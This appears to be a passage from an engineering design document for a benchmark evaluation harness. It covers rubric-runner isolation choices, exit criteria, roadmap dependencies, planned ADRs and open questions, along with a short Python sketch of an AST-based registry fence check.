- Subprocess RubricRunner instead of in-process ([P]/[B]) or microVM ([S]). None of the three proposed it. The synth chooses subprocess because it captures ~80% of microVM's isolation at ~5% of the cost, runs everywhere Python runs (closes critic's CI-substrate attack), and, critically, preserves BenchScore shape so a future microVM swap doesn't invalidate audit records. Rationale: rubric isolation is the one non-reversible decision (per critic's §"Which disagreement matters most for this phase?"); shipping the boundary today is the load-bearing move; shipping the strongest possible boundary is not (microVM costs more than its threat reduction at this phase, given CODEOWNERS L1).
- flock-based cross-process cost cap. None of the three handled the critic's "two concurrent live runs blow the cap" attack. Synth adds it in run_eval; CI cassette runs (cost = 0) skip the lock so they don't serialize unnecessarily.
- Tier state on registration.py#current_tier, not docs/trust-tiers.yaml ([B]). [S] has this; [B] and [P] don't. Synth picks [S]'s shape because the YAML-central-edit pattern would force Phase 7 to edit a file outside bench/migration-chainguard-distroless/, violating the no-edits-to-existing-code invariant.
- No central cases/digests.yaml (departure from [S]). [S]'s "one mismatch → abort" containment is the wrong shape (critic correctly flagged). Per-case cassette_blake3 in case.toml, advisory in 6.5; strict in 7+. Closes [S]'s blast-radius problem.
- No Sigstore anchors / operator-fingerprint signing in 6.5 (departure from [S]). Critic correctly identified the cost/threat asymmetry. Deferred to Phase 16 ADR slot. Local chain in 6.5 still catches every mid-stream tamper; published anchors solve a different (host-compromise) problem.
- asyncio.wait_for timeout, not signal.SIGALRM ([B]). Critic correctly identified SIGALRM-vs-asyncio incompatibility. Phase 6's SUT is async; the harness must be too.
Exit-criteria checklist
Per roadmap.md §Phase 6.5 exit criteria:
| # | Criterion | Satisfied by |
|---|---|---|
| 1 | src/codegenie/eval/ package exists; @register_task_class, BenchScore, harness runner, trust-tier promotion gate are unit-tested. | All Components above; tests/unit/test_eval_* |
| 2 | bench/vuln-remediation/cases/ ≥ 10 curated cases with provenance metadata; rubric.py scores the full set; aggregate bench_score.lower_bound_95 recorded as bronze→silver candidate (numeric value deferred to ADR-0015). | bench/vuln-remediation/ directory contract + integration test test_eval_end_to_end_vuln.py |
| 3 | bench/migration-chainguard-distroless/cases/ ≥ 3 seed cases + working rubric.py; Phase 7 inherits and expands. | bench/migration-chainguard-distroless/ skeleton |
| 4 | Fence-CI: PR adding @register_task_class("foo") without bench/foo/{cases,rubric.py,registration.py} fails with specific diagnostic. | tests/unit/test_eval_fence.py two-stage AST + dir-walk |
| 5 | Trust-tier promotion gate wired but does not auto-promote. | PromotionGate.evaluate (read-only) + apply() raises unconditionally |
| 6 | codegenie eval run --task-class=vuln-remediation exits 0 on backfilled bench, emits aggregate + per-case BenchScore to stdout (JSON) + .codegenie/eval/runs/<utc-iso>-<short>.json. | cli.py + audit.py + integration test |
| 7 | Phase 7 can reference "bench/migration-chainguard-distroless/cases/ ≥ 10 cases with bench_score.lower_bound_95 ≥ tier_threshold[bronze]" as hard precondition. | Threshold on TaskClass.min_cases_for_promotion + PromotionGate reads it |
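Criterion 4's two-stage fence could be sketched as below. This is a simplified illustration, not the fence-CI implementation: FenceError, literal_task_classes, and check_cases are hypothetical names, and Stage 1 only recognizes the bare-name decorator form @register_task_class("...").

```python
import ast
from pathlib import Path
from typing import List


class FenceError(Exception):
    """Raised with a named diagnostic when a fence check fails."""


def literal_task_classes(source: str) -> List[str]:
    """Stage 1: return literal names passed to @register_task_class."""
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.ImportFrom):
            for alias in node.names:
                if alias.name == "register_task_class" and alias.asname:
                    raise FenceError(
                        f"aliased import: register_task_class as {alias.asname}"
                    )
    names = []
    decorated = (ast.ClassDef, ast.FunctionDef, ast.AsyncFunctionDef)
    for node in ast.walk(tree):
        if not isinstance(node, decorated):
            continue
        for dec in node.decorator_list:
            if not (isinstance(dec, ast.Call) and isinstance(dec.func, ast.Name)
                    and dec.func.id == "register_task_class"):
                continue
            first = dec.args[0] if dec.args else None
            if isinstance(first, ast.Constant) and isinstance(first.value, str):
                names.append(first.value)
            else:
                raise FenceError(f"non-literal task-class name on {node.name}")
    if not names:
        raise FenceError("no @register_task_class literal found")
    return names


def check_cases(bench_root: Path, name: str, min_cases: int = 10) -> None:
    """Stage 2: require at least `min_cases` case directories under cases/."""
    cases_dir = bench_root / name / "cases"
    count = 0
    if cases_dir.is_dir():
        count = sum(1 for p in cases_dir.iterdir() if p.is_dir())
    if count < min_cases:
        raise FenceError(f"{cases_dir}: found {count} cases, need {min_cases}")
```

Rejecting aliases outright keeps Stage 1 a pure syntax check: the walker never has to resolve which local name a decorator refers to.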
Load-bearing commitments check
| Commitment | How design honors it |
|---|---|
| No LLM in the gather pipeline | Harness imports zero LLM SDKs; test_eval_package_imports_no_llm_sdk.py enforces structurally. SUT (Phase 6) calls LLMs via Phase 4 cassettes; harness never does. |
| Facts, not judgments | BenchScore is per-case facts; BenchRunReport carries no aggregate_passed boolean — that's a judgment computed by PromotionGate.evaluate from facts + tier thresholds. |
| Honest confidence | Static-introspection rejects confidence/llm/self_reported/model_says field names; extra="forbid" rejects unknown fields; failure_modes surfaces every mode (not just the first); block-severity failure modes block promotion regardless of mean_score. |
| Determinism over probabilism for structural changes | Harness is deterministic given fixed cassettes + cases + rubric; run_id = sha256(...) is content-addressed; two engineers get byte-identical aggregates. |
| Extension by addition | New task class = new bench/{slug}/ directory + one decorator call. Zero edits to src/codegenie/eval/. Tier state on registration.py (no central YAML); no central digest manifest. Phase 7's no-edits invariant is preserved. |
| Organizational uniqueness as data, not prompts | Rubrics are Python (data shape: Rubric Protocol); per-task-class min_cases_for_promotion is data on the registration; tier thresholds are loaded from registration, not prompted. |
| Progressive disclosure for context | BenchCase carries paths, not inlined fixtures; runner loads case bytes lazily; audit record indexes per-case results by case_id. |
| Humans always merge (extended to "humans always promote") | PromotionGate.apply() raises unconditionally; tier change is a hand-edited PR against registration.py#current_tier reviewed by CODEOWNERS. ADR-0009 not amended. |
Roadmap coherence check
What prior phases established that this design depends on:
- Phase 0: project scaffolding (pyproject.toml extras), CLI click integration, codegenie/audit.py shape (Phase-0 RunRecord), import-linter contract, codegenie/hashing.py (BLAKE3).
- Phase 4: cassette discipline (replay in CI; no live LLM); per-cassette identity stable enough to hash per case (the critic correctly flagged that Phase 4 must commit to per-case-addressable cassette identity — flagged as a Phase 6.5 → Phase 4 coordination requirement in §Open questions).
- Phase 5: ADR-0014 (extra="forbid" introspection pattern); ADR-0003 (@register_signal_kind shape mirrored); ADR-0006 (Protocol-when-structural / ABC-when-default-behavior split); ADR-0016 (this design implements it); ADR-0008 (LLM-Judge deferral — this design's bench/judgment-arbitration/ slot is reserved for the un-deferral ADR).
- Phase 6: VulnRemediationSut is the system-under-test contract for vuln-remediation; the LangGraph builder and per-workflow SQLite checkpointer remain Phase 6 internals behind that contract.
What this design establishes that later phases will need:
- Phase 7 inherits the registry, the RubricRunner Protocol, the bench/ directory contract, the audit chain, and uses bench/migration-chainguard-distroless/ as the second worked example. Phase 7's no-edits-to-existing-code invariant is preserved.
- Phase 13 reads BenchRunReport.total_cost_usd from .codegenie/eval/runs/ audit records (cost ledger ingestion). Phase 13's outcome-ledger reconciliation routes through bench/{tc}/cases-pending/ (TB-7 contract reserved here, not implemented).
- Phase 15 (agentic recipe authoring) registers bench/agentic-recipe-authoring/ via the same decorator; rubric scores generated recipes against held-out repos.
- Phase 16 swaps SubprocessRubricRunner → MicroVMRubricRunner via ADR; adds Sigstore/GPG audit anchors; adds last_validated_at staleness probe; adds chain-publication PR job.
New ADRs implied by this design (to be written under docs/phases/06.5-per-task-class-eval-harness/ADRs/):
1. 0001-eval-registry-mirrors-probe-registry.md — the @register_task_class decision and why we use it instead of entry points.
2. 0002-benchscore-frozen-extra-forbid.md — the Pydantic discipline mirroring Phase 5 ADR-0014.
3. 0003-rubric-as-protocol.md — Protocol-not-ABC; RubricRunner strategy seam.
4. 0004-promotion-gate-read-only-verdict.md — apply() raises; tier on registration.py.
5. 0005-subprocess-rubric-runner-as-isolation-boundary.md — NEW (synth) — the load-bearing rubric-isolation decision; documents the subprocess-now / microVM-later split and the audit-chain comparability argument.
6. 0006-eval-audit-chain-without-anchors.md — NEW (synth) — chained EvalRunRecord ships without Sigstore/GPG anchors; future phase ADR adds them.
7. 0007-no-cache-no-parallelism-in-6.5.md — NEW (synth) — defers [P]'s cache + parallelism to Phase 7+ via documented seams.
Open questions deferred to implementation
- Phase 4 cassette per-case identity contract. All three designs assume Phase 4 commits to a per-case-addressable cassette identity the harness can hash without importing Phase 4 internals. Phase 4's final-design.md does not commit to this. Action: Phase 6.5 implementation must coordinate with Phase 4's owner to add a public cassette_path_for(task_class, case_id) -> Path helper; failing that, the harness reads case.toml#cassette_path and trusts the curator. Documented in bench/README.md.
- Bench-case extraction tooling. None of the three designs specify how to extract ≥10 vuln-remediation bench cases from the Phases 3–4 solved-example corpus. The implementation plan must allocate engineering for this (estimated 1–2 weeks).
- Live-LLM cadence. When does the live (non-cassette) eval run? Once per cassette re-record? Once per recipe-set release? Per ADR-0016 §Open Q3, this is deferred to Phase 13 cost ledger; --max-cost-usd=$5.00 default is conservative until Phase 13 lands.
- bench/ repo split. ADR-0016 §Open Q4 defers same-repo-vs-split. Phase 6.5 keeps same-repo; Phase 7's exit review reconsiders if migration cases include customer Dockerfiles.
- Rubric mutation testing. ADR-0016 §Open Q5; Phase 16 territory. Phase 6.5 ships per-rubric unit tests under bench/{tc}/tests/ as the immediate mitigation.
- MicroVMRubricRunner substrate choice. When the future ADR un-defers microVM rubric isolation, it must pick between Firecracker, gVisor, Lima, Docker-in-Docker, or wasmtime. Coordinate with Phase 5's sandbox-stack ADR-0019, since the same substrate decision should apply.
- Audit anchor PR shape. Chain-head publication into git history (without Sigstore) is a one-line follow-on PR; defer to whichever phase first finds host-compromise-detection load-bearing (likely Phase 16). The chain-only approach in 6.5 is sufficient for the threats in scope.